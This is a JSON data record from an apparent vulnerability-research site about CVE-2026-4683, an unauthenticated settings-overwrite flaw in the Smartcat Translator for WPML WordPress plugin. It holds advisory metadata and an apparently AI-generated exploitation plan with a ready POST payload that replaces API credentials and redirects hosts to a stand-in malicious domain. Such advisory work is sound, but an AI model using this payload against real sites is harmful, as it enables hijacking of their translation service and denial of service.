[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1ANRK33i_SVWo40GozbxQCEq9aNq68l6caynzBUxOOk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-4683","smartcat-translator-for-wpml-missing-authorization-to-unauthenticated-plugin-settings-update","Smartcat Translator for WPML \u003C= 3.1.77 - Missing Authorization to Unauthenticated Plugin Settings Update","The Smartcat Translator for WPML plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'routeData' REST endpoint in all versions up to, and including, 3.1.77. This makes it possible for unauthenticated attackers to overwrite the plugin's Smartcat API credentials (account ID, API secret key, hub key, API host, and hub host), effectively hijacking the translation service or causing a denial of service.","smartcat-wpml",null,"\u003C=3.1.77","3.1.78","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:L","Missing Authorization","2026-05-14 00:00:00","2026-05-15 07:46:38",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6a9397ed-eddf-466b-b810-1e2f45afd291?source=api-prod",1,[22,23,24,25,26,27,28,29],"README.txt","admin\u002Fassets\u002Fcss\u002Fsmartcat-ui.css","admin\u002Fassets\u002Fjs\u002Fsmartcat-ui.js","autoload.php","config.php","functions.php","helpers.php","includes\u002FPlugin\u002FPluginLoader.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-4683 Smartcat Translator for WPML\n\n## 1. Vulnerability Summary\nThe **Smartcat Translator for WPML** plugin (up to version 3.1.77) contains a missing authorization vulnerability in its REST API implementation. Specifically, the `routeData` endpoint is registered without a proper `permission_callback` (or with a callback that fails to check for administrative capabilities), allowing unauthenticated users to submit POST requests that modify the plugin's core configuration. An attacker can overwrite Smartcat API credentials, effectively hijacking the translation workflow or causing a Denial of Service (DoS) by pointing the plugin to a malicious or non-existent API host.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-json\u002Fsmartcat\u002Fv1\u002FrouteData` (Namespace `smartcat\u002Fv1` is inferred from `SMARTCAT_API_PREFIX` in `config.php`).\n- **HTTP Method**: `POST`\n- **Payload Format**: JSON\n- **Authentication**: None Required (Unauthenticated).\n- **Preconditions**: The plugin must be active. WPML is technically a requirement for the plugin's operation, but the REST endpoint likely initializes regardless.\n\n## 3. Code Flow\n1. **Registration**: The plugin registers a REST route using `register_rest_route()`. Based on the description, this occurs in an initialization sequence (likely within `includes\u002FServices\u002FAPI\u002F` or a class initialized in `SmartcatWpml.php`).\n2. **Vulnerable Configuration**: The route configuration for `routeData` lacks a `permission_callback` that restricts access to users with `manage_options` or `activate_plugins` capabilities. It may use `__return_true` or be omitted entirely.\n3. **Processing**: The callback function associated with the route (e.g., `update_route_data` or `handle_route_data`) accepts parameters from the `WP_REST_Request` object.\n4. **Sink**: The callback uses `update_option()` or a similar mechanism to save the following values into the WordPress database:\n   - `smartcat_account_id` (inferred)\n   - `smartcat_api_key` (inferred)\n   - `smartcat_hub_key` (inferred)\n   - `smartcat_api_host` (inferred)\n   - `smartcat_hub_host` (inferred)\n\n## 4. Nonce Acquisition Strategy\nAccording to the WordPress REST API design, unauthenticated requests (those without a session cookie) do **not** require a `_wpnonce` or `X-WP-Nonce` header. Since this is an unauthenticated \"Missing Authorization\" vulnerability, no nonce is needed for the exploit payload if sent from a \"clean\" session.\n\n**Verification of absence of nonce requirement:**\nIf the endpoint were intended for authenticated users, the plugin might enqueue a nonce in the admin UI.\n- **JS Localization Key**: `window.smartcat_data` or `window.sc_api_config` (inferred).\n- **Extraction method**:\n  1. Use `browser_navigate` to the plugin settings page: `\u002Fwp-admin\u002Fsettings.php?page=smartcat-wpml`.\n  2. Use `browser_eval` to search for localized nonces.\n  *However, for unauthenticated exploitation, we will proceed by omitting the nonce.*\n\n## 5. Exploitation Strategy\nThe goal is to overwrite the Smartcat API settings to demonstrate unauthorized data modification.\n\n**Step 1: Discover the exact REST Route**\nCheck the site's REST index to confirm the namespace and endpoint.\n- **Request**: `GET \u002Fwp-json\u002F`\n- **Tool**: `http_request`\n\n**Step 2: Submit the Malicious Configuration**\nSend a POST request to the `routeData` endpoint with \"attacker-controlled\" values.\n- **Request URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fsmartcat\u002Fv1\u002FrouteData`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fjson`\n- **Payload**:\n```json\n{\n    \"accountId\": \"VULNERABILITY_CONFIRMED_ACCOUNT\",\n    \"apiKey\": \"VULNERABILITY_CONFIRMED_KEY\",\n    \"hubKey\": \"VULNERABILITY_CONFIRMED_HUB\",\n    \"apiHost\": \"https:\u002F\u002Fmalicious-api.example.com\",\n    \"hubHost\": \"https:\u002F\u002Fmalicious-hub.example.com\"\n}\n```\n*Note: Parameter names are based on `admin\u002Fassets\u002Fjs\u002Fsmartcat-ui.js` references to `accountId`, `apiKey`, etc.*\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure `smartcat-wpml` version 3.1.77 is installed and active.\n2. **Initial State**: (Optional) Configure legitimate-looking dummy credentials using WP-CLI so that the change is more obvious.\n   ```bash\n   wp option update smartcat_account_id \"original_id\"\n   wp option update smartcat_api_key \"original_key\"\n   ```\n\n## 7. Expected Results\n- **Response Code**: `200 OK` or `201 Created`.\n- **Response Body**: Likely a JSON success message like `{\"success\": true}` or returning the updated settings object.\n- **State Change**: The WordPress `options` table should now contain the attacker's values.\n\n## 8. Verification Steps\nAfter performing the `http_request`, verify the modification via WP-CLI:\n```bash\n# Check updated options\nwp option get smartcat_account_id\nwp option get smartcat_api_key\nwp option get smartcat_api_host\n```\nConfirm the output matches `VULNERABILITY_CONFIRMED_ACCOUNT`, etc.\n\n## 9. Alternative Approaches\nIf the JSON keys in the payload differ (e.g., the plugin expects a nested object), analyze the `admin\u002Fassets\u002Fjs\u002Fsmartcat-ui.js` file more deeply for the `registerCredentials` function logic:\n- Search for the string `routeData` in the plugin's PHP directory using `grep -r \"routeData\" .`.\n- If the endpoint requires a specific \"hub key\" format to validate, it may be necessary to match the structure expected by the `HubClient` class.","gemini-3-flash-preview","2026-05-20 17:48:28","2026-05-20 17:49:20",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.1.77","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmartcat-wpml\u002Ftags\u002F3.1.77","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmartcat-wpml.3.1.77.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmartcat-wpml\u002Ftags\u002F3.1.78","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmartcat-wpml.3.1.78.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmartcat-wpml\u002Ftags"]